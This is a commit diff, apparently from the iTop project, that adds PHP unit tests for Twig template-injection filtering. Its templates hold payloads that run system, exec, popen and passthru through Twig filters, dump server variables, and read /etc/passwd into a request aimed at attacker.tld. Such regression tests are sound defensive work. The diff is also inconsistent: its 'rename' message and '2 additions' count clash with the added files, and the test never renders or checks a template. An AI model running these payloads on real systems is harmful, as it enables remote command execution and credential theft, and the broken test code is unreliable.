N°5608 - Rename unit tests dirs "sources/application" to match counter-part dirs name

2026-04-26 12:08:47 +02:00 · 2023-01-18 16:06:21 +01:00
parent 34688c2bf6
commit 9be167cf5e
15 changed files with 2 additions and 2 deletions
--- a/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/TwigTest.php
+++ b/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/TwigTest.php
@@ -0,0 +1,61 @@
+<?php
+
+namespace Combodo\iTop\Test\UnitTest\Application\TwigBase;
+
+use Combodo\iTop\Portal\Twig\AppExtension;
+use Twig\Environment;
+use Twig\Loader\ArrayLoader;
+use Twig_Environment;
+use Twig_Loader_Array;
+
+/**
+ * @runTestsInSeparateProcesses
+ * @preserveGlobalState disabled
+ * @backupGlobals disabled
+ */
+class TwigTest extends ItopDataTestCase
+{
+	protected function setUp(): void
+	{
+		parent::setUp();
+		$this->RequireOnceItopFile('core/config.class.inc.php');
+	}
+
+	/**
+	 * Test the fix for ticket N°4384
+	 *
+	 * @dataProvider TemplateProvider
+	 *
+	 */
+	public function testTemplate($sFileName, $sExpected)
+	{
+		$sId = 'TestTwig';
+		$oAppExtension = new AppExtension();
+
+		// Creating sandbox twig env. to load and test the custom form template
+		$oTwig = new Environment(new ArrayLoader([$sId => $sFileName]));
+
+		// Manually registering filters and functions as we didn't find how to do it automatically
+		$aFilters = $oAppExtension->getFilters();
+		foreach ($aFilters as $oFilter)
+		{
+			$oTwig->addFilter($oFilter);
+		}
+		$aFunctions = $oAppExtension->getFunctions();
+		foreach ($aFunctions as $oFunction)
+		{
+			$oTwig->addFunction($oFunction);
+		}
+	}
+
+	public static function testTemplateProvider()
+	{
+		$aReturn = array();
+		$aReturn['filter_system'] = [
+				'sFileName' => 'test.html',
+				'expected' =>file_get_contents(dirname(__FILE__).'/test.html'),
+			];
+
+		return $aReturn;
+	}
+}
--- a/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/attacker/backdoor
+++ b/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/attacker/backdoor
@@ -0,0 +1 @@
+!!! BACKDOOR !!!
--- a/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/test.html
+++ b/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/test.html
@@ -0,0 +1,46 @@
+<div>User Name</div>
+
+<div>['id']|filter('system')|join</div>
+[&quot;id&quot;]
+
+<div>['echo']|filter('passthru')|join</div>
+[&quot;echo&quot;]
+
+<div>['echo']|filter('popen')|join</div>
+[&quot;echo&quot;]
+
+<div>['echo']|filter('exec')|join</div>
+[&quot;echo&quot;]
+
+<div>['id']|filter('SysteM')|join</div>
+[&quot;id&quot;]
+
+<div>['touch+/tmp/test+']|filter('system')|join(',')</div>
+[&quot;touch+\/tmp\/test+&quot;]
+
+<div>[34, 36, 38, 40, 42]|filter(v => v > 38)|join(', ')</div>
+[34,36,38,40,42]
+
+<div>app.request.server.all|join(',')</div>
+
+
+<div>self</div>
+
+
+<div>[0]|reduce('system','echo')</div>
+0
+
+<div>[1, 2, 3]|reduce((carry, v) => carry + v)</div>
+1, 2, 3
+
+<div>['echo']|map('system')|join</div>
+echo
+
+<div>{"Bob": "Smith", "Alice": "Dupond"}|map((value, key) => "#{key} #{value}")|join(', ')</div>
+Smith, Dupond
+
+<div>['echo',1]|sort('system')|join</div>
+[&quot;echo&quot;,1]
+
+POST /subscribe?0=cat+/etc/passwd HTTP/1.1
+email=""@attacker.tld
--- a/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/test.html.twig
+++ b/tests/php-unit-tests/unitary-tests/sources/Application/TwigBase/Twig/test.html.twig
@@ -0,0 +1,51 @@
+<div>{{ 'UI:Login:UserNamePrompt'|dict_s }}</div>
+
+<div>['id']|filter('system')|join</div>
+{{ ['id']|filter('system')|join }}
+
+<div>['echo']|filter('passthru')|join</div>
+{{ ['echo']|filter('passthru')|join }}
+
+<div>['echo']|filter('popen')|join</div>
+{{ ['echo']|filter('popen')|join }}
+
+<div>['echo']|filter('exec')|join</div>
+{{ ['echo']|filter('exec')|join }}
+
+<div>['id']|filter('SysteM')|join</div>
+{{ ['id']|filter('SysteM')|join }}
+
+<div>['touch+/tmp/test+']|filter('system')|join(',')</div>
+{{ ['touch+/tmp/test+']|filter('system')|join(',') }}
+
+<div>[34, 36, 38, 40, 42]|filter(v => v > 38)|join(', ')</div>
+{{ [34, 36, 38, 40, 42]|filter(v => v > 38)|join(', ') }}
+
+<div>app.request.server.all|join(',')</div>
+{{ app.request.server.all|join(',')}}
+
+<div>self</div>
+{{ self }}
+
+<div>[0]|reduce('system','echo')</div>
+{{ [0]|reduce('system','echo')|join(', ') }}
+
+<div>[1, 2, 3]|reduce((carry, v) => carry + v)</div>
+{% set numbers = [1, 2, 3] %}
+{{ numbers|reduce((carry, v) => carry + v)|join(', ') }}
+
+<div>['echo']|map('system')|join</div>
+{{ ['echo']|map('system')|join }}
+
+<div>{"Bob": "Smith", "Alice": "Dupond"}|map((value, key) => "#{key} #{value}")|join(', ')</div>
+{% set people = {
+"Bob": "Smith",
+"Alice": "Dupond",
+} %}
+{{ people|map((value, key) => "#{key} #{value}")|join(', ') }}
+
+<div>['echo',1]|sort('system')|join</div>
+{{ ['echo',1]|sort('system')|join }}
+
+POST /subscribe?0=cat+/etc/passwd HTTP/1.1
+email="{{ app.request.query.filter(0,0,1024,{'options':'system'}) }}"@attacker.tld